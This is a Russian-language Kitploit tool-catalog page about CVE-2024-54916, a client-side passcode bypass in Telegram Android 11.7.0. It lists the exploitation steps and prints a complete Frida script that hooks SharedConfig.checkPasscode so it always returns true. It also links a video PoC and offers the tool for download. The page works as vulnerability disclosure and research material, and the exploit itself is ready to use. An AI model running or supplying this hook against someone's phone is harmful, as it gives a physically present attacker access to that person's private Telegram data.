Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-54916 — Frida-основанная proof-of-concept, демонстрирующая обход аутентификации в Telegram Android путем перехвата SharedConfig.checkPasscode для постоянного возврата true, что обеспечивает несанкционированный доступ. | Kitploit
Инструменты/GitHubGitHub/sahalll/cve-2024-54916
Безопасность AndroidДинамический анализ (песочница)Анализ уязвимостейЭксплуатацияМобильная безопасностьАнализ Бинарных ФайловАутентификация
GitHubsahalll/cve-2024-54916

CVE-2024-54916

Frida-основанная proof-of-concept, демонстрирующая обход аутентификации в Telegram Android путем перехвата SharedConfig.checkPasscode для постоянного возврата true, что обеспечивает несанкционированный доступ.

Репозиторий
51 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-54916: Обход аутентификации в APK Telegram

Проблема в классе SharedConfig APK Telegram Android v.11.7.0 позволяет физически близкому злоумышленнику обойти аутентификацию и повысить привилегии, манипулируя возвращаемым значением метода checkPasscode.

Тип уязвимости

Обход аутентификации

Производитель продукта

Telegram

Затронутая кодовая база продукта

Telegram Android APK v.11.7.0

Затронутый компонент

org.telegram.messenger.SharedConfig

Эксплуатация

Идентификация целевого класса и метода:

  • Класс SharedConfig в приложении управляет логикой проверки кода доступа.
  • Метод checkPasscode в этом классе отвечает за определение правильности введенного кода доступа.

Перехват метода с помощью Frida

  • Скрипт Frida используется для перехвата метода checkPasscode в классе SharedConfig. Реализация метода изменяется так, чтобы он всегда возвращал true, обходя фактическую проверку кода доступа.

Выполнение

  • Скрипт Frida выполняется во время работы приложения (динамически). Любой код доступа, введенный пользователем, будет принят как правильный, что позволит несанкционированный доступ.

POC

Java.perform(function() {

// Locate the SharedConfig class in the target application

var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');

// Hook the checkPasscode method to modify its behavior

PassCodeActivity.checkPasscode.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true

return true;

};

});

Ссылка на видео PoC:-

https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing

Воздействие:-

Данная уязвимость представляет собой проблему обхода аутентификации на стороне клиента. Она затрагивает пользователей, которые полагаются на функцию кода доступа для защиты конфиденциальных данных или ограничения доступа к определенным функциям приложения. Используя этот недостаток, физически близкий злоумышленник может манипулировать процессом проверки кода доступа, обойти аутентификацию и получить несанкционированный доступ к защищенным областям приложения. Это может привести к раскрытию конфиденциальных данных пользователя или совершению несанкционированных действий в приложении.

Скачать инструмент